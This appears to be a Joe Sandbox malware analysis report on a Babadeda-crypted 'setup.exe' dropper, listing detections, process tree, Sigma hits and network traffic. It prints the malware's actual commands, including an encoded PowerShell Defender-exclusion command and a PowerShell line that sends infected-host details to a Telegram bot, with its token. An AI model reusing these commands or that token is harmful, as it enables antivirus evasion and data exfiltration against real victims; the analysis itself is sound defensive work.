Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1579562
MD5:9ee966ddff608734b5b15cd5f1d810d8
SHA1:0b3477a4e740c78a0fbb479353cd068c998ead6f
SHA256:5f82e21c783da05e616618ac9aca0dc5b240bcb3dbf15c4d2d07d19fe57bc056
Tags:exeuser-aachum
Infos:

Detection

Babadeda
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Check external IP via Powershell
Yara detected Babadeda
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to hide a thread from the debugger
Drops PE files to the startup folder
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 2008 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 9EE966DDFF608734B5B15CD5F1D810D8)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7464 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • svchost.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 487267C7B1B9BB3029AD15AAF79827A2)
      • svchost.exe (PID: 7256 cmdline: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe" MD5: A3027B4F632E949EF06C151BD8787FAF)
        • svchost.exe (PID: 7304 cmdline: "C:\ProgramData\svchost\svchost.exe" --run MD5: A3027B4F632E949EF06C151BD8787FAF)
    • tg.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\Temp\tg.exe" MD5: F8ECEDC88E4D2776486231D0EF0AEA5D)
      • cmd.exe (PID: 7176 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7296 cmdline: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7524 cmdline: powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7800 cmdline: powershell -Command "$env:COMPUTERNAME" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 7932 cmdline: powershell -Command "[System.Environment]::OSVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 8024 cmdline: powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 8104 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • client.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Local\Temp\client.exe" MD5: 0302EF4E965477DD225B298374C62722)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7888 cmdline: "C:\ProgramData\svchost\svchost.exe" --run MD5: A3027B4F632E949EF06C151BD8787FAF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\tg.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    4.2.tg.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
      4.0.tg.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Files With System Process Name In Unsuspected Locations
        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\setup.exe, ProcessId: 2008, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
        Sigma detected: System File Execution Location Anomaly
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 5968, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
        Sigma detected: Suspicious Execution of Powershell with Base64
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7176, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7508, ProcessName: cmd.exe
        Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\svchost\svchost.exe" --run, EventID: 13, EventType: SetValue, Image: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe, ProcessId: 7256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA=", ProcessId: 1396, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 2008, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5968, ProcessName: svchost.exe

        Language, Device and Operating System Detection

        barindex
        Sigma detected: Check external IP via Powershell
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7176, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7508, ProcessName: cmd.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: setup.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Source: C:\ProgramData\svchost\svchost.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeReversingLabs: Detection: 63%
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeVirustotal: Detection: 69%Perma Link
        Source: C:\ProgramData\svchost\svchost.exeReversingLabs: Detection: 63%
        Source: C:\ProgramData\svchost\svchost.exeVirustotal: Detection: 69%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\tg.exeReversingLabs: Detection: 23%
        Multi AV Scanner detection for submitted file
        Source: setup.exeVirustotal: Detection: 61%Perma Link
        Source: setup.exeReversingLabs: Detection: 63%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
        Machine Learning detection for dropped file
        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\tg.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\svchost\svchost.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Temp\tg.exeUnpacked PE file: 4.2.tg.exe.400000.0.unpack
        Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: Binary string: D:\Projects\WinRAR\SFX\build\sfxrar64\Release\sfxrar.pdb source: setup.exe, 00000000.00000002.1782894473.0000000004B87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1692339333.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ACA9C0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACA9C0
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669AB341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669AB341C
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 3_2_00007FF669ADEBE0 FindFirstFileExA,3_2_00007FF669ADEBE0
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\AppData\Local\Temp\1BBA.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\tg.exeFile opened: C:\Users\user\Jump to behavior

        Networking

        barindex
        Uses the Telegram API (likely for C&C communication)
        Source: unknownDNS query: name: api.telegram.org
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 260Expect: 100-continueConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: unknownHTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 260Expect: 100-continueConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
